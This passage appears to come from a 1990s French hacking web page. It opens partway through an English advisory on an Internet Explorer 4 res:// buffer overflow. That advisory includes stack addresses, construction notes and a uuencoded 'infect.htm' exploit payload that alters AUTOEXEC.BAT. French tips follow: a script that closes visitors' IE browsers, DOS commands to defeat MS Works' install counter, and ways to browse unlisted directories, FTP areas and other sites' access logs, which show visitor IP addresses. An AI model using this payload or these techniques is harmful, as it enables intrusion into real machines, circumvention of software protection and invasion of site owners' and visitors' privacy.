<BR><FONT SIZE=-1>&nbsp;&nbsp;&nbsp;&nbsp; target application.</FONT>
<BR><FONT SIZE=-1>&nbsp; 2. Point to it. Look at it.</FONT>
<BR><FONT SIZE=-1>&nbsp; 3. Click on the link. (or let someone click it
for you)</FONT>
<BR><FONT SIZE=-1>&nbsp; 4. Become aware of what happens to your machine.</FONT>
<BR><FONT SIZE=-1>&nbsp; 5. Freak out and beg Microsoft to make the bad
man stop.</FONT>

<P><FONT SIZE=-1>&nbsp;=================</FONT>
<BR><FONT SIZE=-1>&nbsp;Technical Details</FONT>
<BR><FONT SIZE=-1>&nbsp;=================</FONT>

<P><FONT SIZE=-1>&nbsp; The problem here lies in the deciphering of the
URL line format itself. The</FONT>
<BR><FONT SIZE=-1>&nbsp; base HTML library that is used by the Internet
Explorer 4.0 Suite and the</FONT>
<BR><FONT SIZE=-1>&nbsp; following programs are vulnerable:</FONT>

<P><FONT SIZE=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Outlook Express
(both mail and news)</FONT>
<BR><FONT SIZE=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Windows
Explorer</FONT>
<BR><FONT SIZE=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; - Internet
Explorer (different than regular explorer, really)</FONT>

<P><FONT SIZE=-1>&nbsp; This problem, because it stems from a programming
flaw in the HTML decoding</FONT>
<BR><FONT SIZE=-1>&nbsp; system, is unaffected by the Explorer "Security
Zones" feature. In other</FONT>
<BR><FONT SIZE=-1>&nbsp; words, if you turn on the highest security level
for the zone from where the</FONT>
<BR><FONT SIZE=-1>&nbsp; exploit HTML is being viewed, you are still vulnerable.</FONT>

<P><FONT SIZE=-1>&nbsp; The critical problem here is a buffer overflow
in the parsing of a particular</FONT>
<BR><FONT SIZE=-1>&nbsp; new type of URL protocol. The "res://" type of
URL is meant to allow access</FONT>
<BR><FONT SIZE=-1>&nbsp; to a local resource embedded in a local DLL file.
This is useful for</FONT>
<BR><FONT SIZE=-1>&nbsp; archiving entire websites into a DLL and is not,
in its truest concept, a</FONT>
<BR><FONT SIZE=-1>&nbsp; security flaw.</FONT>

<P><FONT SIZE=-1>&nbsp; For example, to read something out of the IE4.0
Tour (stored in a DLL) try</FONT>
<BR><FONT SIZE=-1>&nbsp; the following URL: res://ie4tour.dll/page1-6.htm</FONT>

<P><FONT SIZE=-1>&nbsp; The buffer overflow is on the actual filename specified.
To crash your</FONT>
<BR><FONT SIZE=-1>&nbsp; machine go ahead and try res://blahblahblah ...
blahblah/ in your Internet</FONT>
<BR><FONT SIZE=-1>&nbsp; Explorer window where the amount of 'blah' equals
265 characters.</FONT>

<P><FONT SIZE=-1>&nbsp; The function that goes through the filename and
validates it is flawed on</FONT>
<BR><FONT SIZE=-1>&nbsp; Windows 95. Without checking the length, the filename
is uppercased,</FONT>
<BR><FONT SIZE=-1>&nbsp; concatenated with '.DLL' if it isn't there already,
and in the process,</FONT>
<BR><FONT SIZE=-1>&nbsp; copied into a fixed size buffer.</FONT>

<P><FONT SIZE=-1>&nbsp;========</FONT>
<BR><FONT SIZE=-1>&nbsp;Solution</FONT>
<BR><FONT SIZE=-1>&nbsp;========</FONT>

<P><FONT SIZE=-1>&nbsp; Currently, there is no solution available for this
flaw. You can't set any</FONT>
<BR><FONT SIZE=-1>&nbsp; Internet Explorer options to avoid it, and you
are not protected by any</FONT>
<BR><FONT SIZE=-1>&nbsp; level of zone security. Simply don't surf the
web, read email or view</FONT>
<BR><FONT SIZE=-1>&nbsp; net news using Internet Explorer 4.0 until Microsoft
puts up a hotfix.</FONT>

<P><FONT SIZE=-1>&nbsp;============</FONT>
<BR><FONT SIZE=-1>&nbsp;Exploit Code</FONT>
<BR><FONT SIZE=-1>&nbsp;============</FONT>
<BR>&nbsp;

<P><FONT SIZE=-1>&nbsp;&nbsp;&nbsp; Here we go...</FONT>
<BR><FONT SIZE=-1>&nbsp;&nbsp;&nbsp; When constructing the exploit we want
to try something useful.</FONT>
<BR><FONT SIZE=-1>&nbsp;&nbsp;&nbsp; Lets's start with appending text of
your choice to AUTOEXEC.BAT...</FONT>
<BR><FONT SIZE=-1>&nbsp;&nbsp;&nbsp; (note that running native code lets
you do pretty much anything you want)</FONT>

<P><FONT SIZE=-1>&nbsp;&nbsp;&nbsp; Note that the location of the exploit
string in the stack is very important</FONT>
<BR><FONT SIZE=-1>&nbsp;&nbsp;&nbsp; and it varies from target application
to target application.</FONT>

<P><FONT SIZE=-1>&nbsp;&nbsp;&nbsp; Constructing the exploit string:</FONT>
<BR><FONT SIZE=-1>&nbsp;&nbsp;&nbsp; Figure out stack location for exploit
code...</FONT>

<P><FONT SIZE=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; App&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Loc</FONT>
<BR><FONT SIZE=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Internet Explorer&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
0x0057C144</FONT>
<BR><FONT SIZE=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Windows Explorer&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
0x0088A0F4</FONT>
<BR><FONT SIZE=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ...</FONT>

<P><FONT SIZE=-1>&nbsp;&nbsp;&nbsp; Yeah, I know that those locations have
null bytes in them and you can't</FONT>
<BR><FONT SIZE=-1>&nbsp;&nbsp;&nbsp; put those (or lowercase letters, or
CR/LF or 0x07 or anything like that)</FONT>
<BR><FONT SIZE=-1>&nbsp;&nbsp;&nbsp; in the exploit string... but we'll
let microsoft fix that for us. Step thru</FONT>
<BR><FONT SIZE=-1>&nbsp;&nbsp;&nbsp; the process to see IE add that extra
null character for you. Will they</FONT>
<BR><FONT SIZE=-1>&nbsp;&nbsp;&nbsp; ever cease to amaze...</FONT>

<P><FONT SIZE=-1>&nbsp;&nbsp;&nbsp; Put together what you wanna do, tack
on the necessary jump addresses and</FONT>
<BR><FONT SIZE=-1>&nbsp;&nbsp;&nbsp; all that. That's it.</FONT>
<BR>&nbsp;

<P><FONT SIZE=-1>And now, UUENCODED to preserve freshness:</FONT>

<P><FONT SIZE=-1>*************************************************************************</FONT>
<BR><FONT SIZE=-1>* MAKE SURE YOU RUN THIS EXPLOIT WITH __INTERNET__ EXPLORER,
_NOT_&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; *</FONT>
<BR><FONT SIZE=-1>* REGULAR OL' WINDOWS EXPLORER. (put it on a website
and download it or *</FONT>
<BR><FONT SIZE=-1>* click on the IE desktop icon (run iexplore.exe) and
type in the name&nbsp; *</FONT>
<BR><FONT SIZE=-1>* of the file into the URL line)&nbsp; IT WON'T WORK
OTHERWISE!!!!&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
*</FONT>
<BR><FONT SIZE=-1>*&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
(though it could be made to do so)&nbsp;&nbsp;&nbsp;&nbsp; *</FONT>
<BR><FONT SIZE=-1>*************************************************************************</FONT>

<P><FONT SIZE=-1>----====/ SNIP</FONT>

<P><FONT SIZE=-1>section 1 of uuencode 5.20 of file infect.htm&nbsp;&nbsp;&nbsp;
by R.E.M.</FONT>

<P><FONT SIZE=-1>begin 644 infect.htm</FONT>
<BR><FONT SIZE=-1>M/&amp;AT;6P^#0H\:&amp;5A9#X-"CQT:71L93X-"DEN=&amp;5R;F5T($5X&lt;&amp;QO:71E&lt;@T*</FONT>
<BR><FONT SIZE=-1>M/"]T:71L93X-"CPO:&amp;5A9#X-"CQB;V1Y(&amp;)G8V]L;W(](T9&amp;1D9&amp;1B!T97AT</FONT>
<BR><FONT SIZE=-1>M/2,P,#`P,#`^#0H-"CQC96YT97(^#0H\:#$^5VAA="!D;R!)('=A;G0@=&amp;\@</FONT>
<BR><FONT SIZE=-1>M:6YF96-T('1O9&amp;%Y/SPO:#$^#0H-"D-L:6-K(&amp;AE&amp;5C+F)A=#QP/@T*#0H\82!H_@.^`</FONT>
<BR><FONT SIZE=-1>_]-:6E"0D#/;LP)3@^L$4U"[X(#YO__3@^P,D%A0</FONT>
<BR><FONT SIZE=-1>M,]NS.5.[#-+G$('K$!"0$%-0N[#*^;__TX/$#)"0D)"[SX#YO__3D)"0N["O</FONT>
<BR><FONT SIZE=-1>M^+__TY"0D,S,+2TM+2TM+2TM+2TM+4,Z7$%55$]%6$5#+D)!5("-BD5#2$\@</FONT>
<BR><FONT SIZE=-1>M34E#4D\D3T94(#!73EH@64]5+BXN(%)%4$5.5"!!3D0@0D4@4T%6140AC8I0</FONT>
<BR><FONT SIZE=-1>M055318V*@"TM+2TM+2TM+2TM+2TM+2U!04%!0D)"0D,!(+Z_1$1$143!5R\-</FONT>
<BR><FONT SIZE=-1>M"B(^#0H\9F]N="!F86-E/2)7:6YG9&amp;EN9W,B('-I>F4]*S8^_SPO9F]N=#X\</FONT>
<BR><FONT SIZE=-1>M9F]N="!S:7IE/2LV/CT\+V9O;G0^/&amp;9O;G0@9F%C93TB5VEN9V1I;F=S(B!S</FONT>
<BR><FONT SIZE=-1>M:7IE/2LV/B9G=#PO9F]N=#X-"CPO83X-"@T*/"]C96YT97(^#0H-"CPO8F]D</FONT>
<BR><FONT SIZE=-1>->3X-"CPO:'1M;#X-"CX-</FONT>
<BR><FONT SIZE=-1>`</FONT>
<BR><FONT SIZE=-1>end</FONT>
<BR><FONT SIZE=-1>sum -r/size 62455/917 section (from "begin" to "end")</FONT>
<BR><FONT SIZE=-1>sum -r/size 5779/643 entire input file</FONT>

<P><FONT SIZE=-1>/====---- SNIP</FONT>
<BR>&nbsp;

<P><FONT SIZE=-1>A haiku:</FONT>

<P><FONT SIZE=-1>&nbsp;Microsoft IE</FONT>
<BR><FONT SIZE=-1>&nbsp;Is there no security?</FONT>
<BR><FONT SIZE=-1>&nbsp;Not if you ask me.</FONT>

<P><FONT SIZE=-1>dildog@l0pht.com (11/1/97)</FONT>

<P>&nbsp;&nbsp; -&nbsp; Vous fa&icirc;tes des pages HTML pour votre site
internet? ce script est &agrave; installer au d&eacute;but:
<BR>&lt;BODY>
<BR>&lt;script language='JavaScript'>
<BR>function closeit()
<BR>{
<BR>&nbsp; if (navigator.appName == "Microsoft Internet Explorer")
<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; self.close()
<BR>}
<BR>&lt;/script>
<BR>Tout navigateur de type Microdoft Internet Explorer qui dig&egrave;re
le javascript sera automatiquement ferm&eacute;.

<P>&nbsp;&nbsp; -(source: Pirates Mag) <I>J'utilise le programme <FONT COLOR="#FF0000">MS
WORKS 1.05 en version fran&ccedil;aise pour Dos.</FONT><FONT COLOR="#000000">
Malheureusement, suite &agrave; plusieurs plantages disques dus aux applications
utilis&eacute;es, j'ai du r&eacute;installer &agrave; chaque fois ce programme.
Aujourd'hui le compteur est &agrave; z&eacute;ro et je ne peuc plus rien
faire. Pire, Microsoft ne peut (ou ne veut) rien faire pour moi. Avez vous
une solution? Anonyme.</FONT></I>

<P><FONT COLOR="#000000">La position de Microsoft est d&eacute;plorable.
Et comme nous n'avons pas pu non plus obtenir plus d'informations de la
part du support technique, nous vous proposons notre propre solution que
nous avons trouv&eacute;e en &eacute;xaminant votre disquette. Sous Dos,
copiez l'int&eacute;gralit&eacute; de la disquette dans le r&eacute;pertoire
de votre choix avec la commande </FONT><FONT COLOR="#FF0000">XCOPY A: nom_r&eacute;pertoire
</FONT><FONT COLOR="#000000">(r&eacute;pondre par oui aux questions pos&eacute;es).
Allez dans ce r&eacute;pertoire en tapant&nbsp;</FONT><FONT COLOR="#FF0000">
nom_r&eacute;pertoire</FONT><FONT COLOR="#000000"> Tapez maintenant les
commandes suivantes:</FONT>
<BR><FONT COLOR="#FF0000">MD ^~</FONT>
<BR><FONT COLOR="#FF0000">ATTRIB +R +H ^~</FONT>
<BR><FONT COLOR="#FF0000">MD _~</FONT>
<BR><FONT COLOR="#FF0000">ATTRIB + R+H _~</FONT>
<BR>Works peut maintenant fonctionner &agrave; partir de votre disque dur!
Si vous voulez l'effacer, tapez:
<BR><FONT COLOR="#FF0000">ATTRIB -R -H ^~</FONT>
<BR><FONT COLOR="#FF0000">RD ^~</FONT>
<BR><FONT COLOR="#FF0000">ATTRIB -R -H _~</FONT>
<BR><FONT COLOR="#FF0000">RD _~</FONT>
<BR><FONT COLOR="#FF0000">&nbsp;</FONT>
<BR><FONT COLOR="#FF0000">&nbsp;&nbsp; </FONT><FONT COLOR="#000000">- Vous
naviguez sur le net, quand soudain vous voyez un site dont l'url est: (je
dis n'importe quoi mais c'est pour un exemple) http://www.multimania.com/08/tioto/info/user/index.htm.
A premi&egrave;re vue cela ressemble &agrave; un url comme un autre un
peu long, mais des url long y'en a partout, me direz-vous! Eh ben, petite
astuce si le mec se d&eacute;brouille pas trop bien pour faire ses pages:
vous remettez l'url en retirant &agrave; chaque fois un segment ce qui
donnera&nbsp; http://www.multimania.com/08/tioto/info/user/ et vous tapez:
enter... soit le navigateur affiche: erreur ,soit il affiche acc&egrave;s
interdit, soit il vous met &agrave; une page html, ou bien encore (et c'est
l&agrave; que &ccedil;a nous int&eacute;resse) il vous mets des r&eacute;pertoires.
Des r&eacute;pertoires? Oui... En faisant cette manip vous avez environ
1/3 ou un 1/4 des sites qui vous mettront tout ce qui est pass&eacute;
en ftp. C'est &agrave; dire m&ecirc;me des images non visibles sur le site,
ou des liens que l'on ne voit pas sur le site, etc... Imaginez que vous
tombez sur un site cochon qui n'en a pas l'air! Hein? Mais si la manip
marche pas continuez &agrave; retirer des segments jusqu'&agrave; arriver
au serveur!</FONT>

<P><FONT COLOR="#000000">&nbsp;&nbsp; - Acc&eacute;der au compte ftp d'un
site: prenons l'exemple d'un site quelconque! Je prends: http://www.hackers.com
qui est un site vachement merdique. En allant sur son compte ftp par cet
url: ftp://www.hacker.com on a: Current directory is /</FONT>

<P><FONT COLOR="#000000">&nbsp; bin/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Wed Oct 30 00:00:00 1996 Directory</FONT>
<BR><FONT COLOR="#000000">&nbsp; pub/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Tue Jun&nbsp; 3 00:00:00 1997 Directory</FONT>

<P><FONT COLOR="#000000">alors on &eacute;volue en cliquant sur pub et
on trouve des trucs de hack! Ce que le site lui m&ecirc;me ne laisse pas
para&icirc;tre! cela donne:</FONT>
<BR><FONT COLOR="#000000">Current directory is /pub</FONT>

<P><FONT COLOR="#000000">Up to higher level directory</FONT>
<BR><FONT COLOR="#000000">&nbsp; acrobat/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Tue Dec 17 00:00:00 1996 Directory</FONT>
<BR><FONT COLOR="#000000">&nbsp; doc/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Mon Oct 10 00:00:00 1994 Directory</FONT>
<BR><FONT COLOR="#000000">&nbsp; mac/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Fri Jul 25 00:00:00 1997 Directory</FONT>
<BR><FONT COLOR="#000000">&nbsp; msdos/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Mon Mar&nbsp; 4 00:00:00 1996 Directory</FONT>
<BR><FONT COLOR="#000000">&nbsp; phoenix/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Thu Jan 19 00:00:00 1995 Directory</FONT>
<BR><FONT COLOR="#000000">&nbsp; text_files/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Thu Dec 22 00:00:00 1994 Directory</FONT>
<BR><FONT COLOR="#000000">&nbsp; users/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Sat Nov 14 01:20:00 1998 Directory</FONT>
<BR><FONT COLOR="#000000">&nbsp; windows/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Tue Jun&nbsp; 3 00:00:00 1997 Directory</FONT>
<BR><FONT COLOR="#000000">&nbsp;</FONT>
<BR><FONT COLOR="#000000">et si on va dans msdos on a:</FONT>

<P><FONT COLOR="#000000">Current directory is /pub/msdos</FONT>

<P><FONT COLOR="#000000">Up to higher level directory</FONT>
<BR><FONT COLOR="#000000">&nbsp; compress/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Thu Aug 21 00:00:00 1997 Directory</FONT>
<BR><FONT COLOR="#000000">&nbsp; games/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Mon Mar&nbsp; 4 00:00:00 1996 Directory</FONT>
<BR><FONT COLOR="#000000">&nbsp; term_progs/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Tue Nov&nbsp; 1 00:00:00 1994 Directory</FONT>
<BR><FONT COLOR="#000000">&nbsp; uuencode/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Thu Sep&nbsp; 8 00:00:00 1994 Directory</FONT>

<P><FONT COLOR="#000000">Qui ne sont autres que des r&eacute;pertoires
de hack!</FONT>

<P><FONT COLOR="#000000">Voyez donc l'utilisation que vous pouvez faire
de cet astuce! Int&eacute;ressant non?</FONT>

<P>&nbsp;&nbsp; - Acc&eacute;der aux statistiques d'un site: il y a tr&egrave;s
peu de sites ou vous pourrez acc&eacute;der aux statistiques. Tapez (c'est
un exemple): http://www.xxxxxx.com/stats Vous atterrirez sur une page avec
les statistiques du site qui se pr&eacute;sente comme &ccedil;a:
<BR>Index of /stats

<P>&nbsp;&nbsp;&nbsp; Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Last modified&nbsp;&nbsp;&nbsp;&nbsp; Size&nbsp; Description
<BR>&nbsp;

<P>&nbsp;&nbsp;&nbsp; Parent Directory&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
23-Sep-98 16:48&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; -
<BR>&nbsp;&nbsp;&nbsp; DailyHitStats.gif&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
07-Nov-98 02:02&nbsp;&nbsp;&nbsp;&nbsp; 3k
<BR>&nbsp;&nbsp;&nbsp; DailyVolumeStats.gif&nbsp;&nbsp; 07-Nov-98 02:02&nbsp;&nbsp;&nbsp;&nbsp;
4k
<BR>&nbsp;&nbsp;&nbsp; HourlyHitStats.gif&nbsp;&nbsp;&nbsp;&nbsp; 07-Nov-98
02:02&nbsp;&nbsp;&nbsp;&nbsp; 4k
<BR>&nbsp;&nbsp;&nbsp; HourlyVolumeStats.gif&nbsp; 07-Nov-98 02:02&nbsp;&nbsp;&nbsp;&nbsp;
4k
<BR>&nbsp;&nbsp;&nbsp; TopLevelDomainHitStat..07-Nov-98 02:02&nbsp;&nbsp;&nbsp;&nbsp;
2k
<BR>&nbsp;&nbsp;&nbsp; TopLevelDomainVolumeS..07-Nov-98 02:02&nbsp;&nbsp;&nbsp;&nbsp;
2k
<BR>&nbsp;&nbsp;&nbsp; TopNDomainsHitStats.gif07-Nov-98 02:02&nbsp;&nbsp;&nbsp;&nbsp;
3k
<BR>&nbsp;&nbsp;&nbsp; TopNDomainsVolumeStat..07-Nov-98 02:02&nbsp;&nbsp;&nbsp;&nbsp;
3k
<BR>&nbsp;&nbsp;&nbsp; TopNFilesHitStats.gif&nbsp; 07-Nov-98 02:02&nbsp;&nbsp;&nbsp;&nbsp;
4k
<BR>&nbsp;&nbsp;&nbsp; TopNFilesVolumeStats...07-Nov-98 02:02&nbsp;&nbsp;&nbsp;&nbsp;
4k
<BR>&nbsp;&nbsp;&nbsp; access_log&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
07-Nov-98 19:13&nbsp;&nbsp;&nbsp;&nbsp; 4k
<BR>&nbsp;&nbsp;&nbsp; error_log&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
15-Oct-98 19:16&nbsp;&nbsp;&nbsp;&nbsp; 5k
<BR>&nbsp;&nbsp;&nbsp; graph.html&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
07-Nov-98 02:02&nbsp;&nbsp;&nbsp;&nbsp; 4k
<BR>&nbsp;&nbsp;&nbsp; httpstats.html&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
07-Nov-98 02:02&nbsp;&nbsp;&nbsp;&nbsp; 9k
<BR>&nbsp;&nbsp;&nbsp; stats-xxxx-98_Aug.ta..01-Sep-98 05:32&nbsp;&nbsp;&nbsp;&nbsp;
1k
<BR>&nbsp;&nbsp;&nbsp; stats-xxxx-98_Jul.ta..01-Aug-98 05:30&nbsp;&nbsp;&nbsp;&nbsp;
1k
<BR>&nbsp;&nbsp;&nbsp; stats-xxxx-98_Jun.ta..01-Jul-98 05:32&nbsp;&nbsp;&nbsp;&nbsp;
1k
<BR>&nbsp;&nbsp;&nbsp; stats-xxxx-98_Oct.ta..01-Nov-98 05:33&nbsp;&nbsp;&nbsp;&nbsp;
1k
<BR>&nbsp;&nbsp;&nbsp; stats-xxxx-98_Sep.ta..01-Oct-98 05:33&nbsp;&nbsp;&nbsp;&nbsp;
1k
<BR>&nbsp;Je garde le nom secret pour pas qu'il y ait de petits malins
qui viennent envahir les stats d'un site. En fait celui-ci je me le garde
;-). Maintenant vous tapez: http://www.xxxx.com/stats/access_log, et vous
obtenez:
<BR>web4.infonie.fr - - [05/Nov/1998:10:32:18 +0100] "GET / HTTP/1.0" 200
3767
<BR>web4.infonie.fr - - [05/Nov/1998:10:32:19 +0100] "GET /probate2.jpg
HTTP/1.0" 200 706
<BR>web4.infonie.fr - - [05/Nov/1998:10:32:20 +0100] "GET /soiseau.gif
HTTP/1.0" 200 2333
<BR>web4.infonie.fr - - [05/Nov/1998:10:32:20 +0100] "GET /pismo.jpg HTTP/1.0"
200 1272
<BR>web4.infonie.fr - - [05/Nov/1998:10:32:21 +0100] "GET /ilogofi.gif
HTTP/1.0" 200 3645
<BR>web4.infonie.fr - - [05/Nov/1998:10:32:32 +0100] "GET /devis.htm HTTP/1.0"
200 5558
<BR>195.68.45.51 - - [06/Nov/1998:15:15:53 +0100] "GET / HTTP/1.0" 200
3767
<BR>195.68.45.51 - - [06/Nov/1998:15:15:54 +0100] "GET /ilogofi.gif HTTP/1.0"
200 3645
<BR>195.68.45.51 - - [06/Nov/1998:15:15:54 +0100] "GET /probate2.jpg HTTP/1.0"
200 706
<BR>195.68.45.51 - - [06/Nov/1998:15:15:54 +0100] "GET /pismo.jpg HTTP/1.0"
200 1272
<BR>195.68.45.51 - - [06/Nov/1998:15:15:54 +0100] "GET /soiseau.gif HTTP/1.0"
200 2333
<BR>195.68.45.12 - - [06/Nov/1998:15:35:46 +0100] "GET / HTTP/1.0" 200
3767
<BR>195.68.45.12 - - [06/Nov/1998:15:35:46 +0100] "GET /ilogofi.gif HTTP/1.0"
200 3645
<BR>195.68.45.12 - - [06/Nov/1998:15:35:47 +0100] "GET /probate2.jpg HTTP/1.0"
200 706
<BR>195.68.45.12 - - [06/Nov/1998:15:35:47 +0100] "GET /pismo.jpg HTTP/1.0"
200 1272
<BR>195.68.45.12 - - [06/Nov/1998:15:35:47 +0100] "GET /soiseau.gif HTTP/1.0"
200 2333
<BR>195.68.45.12 - - [06/Nov/1998:15:36:26 +0100] "GET /service.htm HTTP/1.0"
200 2004
<BR>195.68.45.12 - - [06/Nov/1998:15:36:26 +0100] "GET /ibuton.gif HTTP/1.0"
200 1113
<BR>195.68.45.12 - - [06/Nov/1998:15:36:41 +0100] "GET /devis.htm HTTP/1.0"
200 5558
<BR>195.68.45.12 - - [06/Nov/1998:15:37:23 +0100] "GET /index.htm HTTP/1.0"
200 3767
<BR>193.252.201.13 - - [07/Nov/1998:01:31:22 +0100] "GET / HTTP/1.1" 200
3767
<BR>193.252.201.13 - - [07/Nov/1998:01:31:23 +0100] "GET /soiseau.gif HTTP/1.1"
200 2333
<BR>193.252.201.13 - - [07/Nov/1998:01:31:23 +0100] "GET /probate2.jpg
HTTP/1.1" 200 706
<BR>193.252.201.13 - - [07/Nov/1998:01:31:23 +0100] "GET /pismo.jpg HTTP/1.1"
200 1272
<BR>193.252.201.13 - - [07/Nov/1998:01:31:23 +0100] "GET /ilogofi.gif HTTP/1.1"
200 3645
<BR>zanussi.netcraft.co.uk - - [07/Nov/1998:10:26:41 +0100] "HEAD / HTTP/1.1"
200 0
<BR>troy3-86.abo.wanadoo.fr - - [07/Nov/1998:11:06:15 +0100] "GET / HTTP/1.1"
200 3767
<BR>troy3-86.abo.wanadoo.fr - - [07/Nov/1998:11:06:16 +0100] "GET /soiseau.gif
HTTP/1.1" 200 2333
<BR>troy3-86.abo.wanadoo.fr - - [07/Nov/1998:11:06:16 +0100] "GET /probate2.jpg
HTTP/1.1" 200 706
<BR>troy3-86.abo.wanadoo.fr - - [07/Nov/1998:11:06:17 +0100] "GET /pismo.jpg
HTTP/1.1" 200 1272
<BR>troy3-86.abo.wanadoo.fr - - [07/Nov/1998:11:06:18 +0100] "GET /ilogofi.gif
HTTP/1.1" 200 3645
<BR>troy3-86.abo.wanadoo.fr - - [07/Nov/1998:11:06:51 +0100] "GET /service.htm
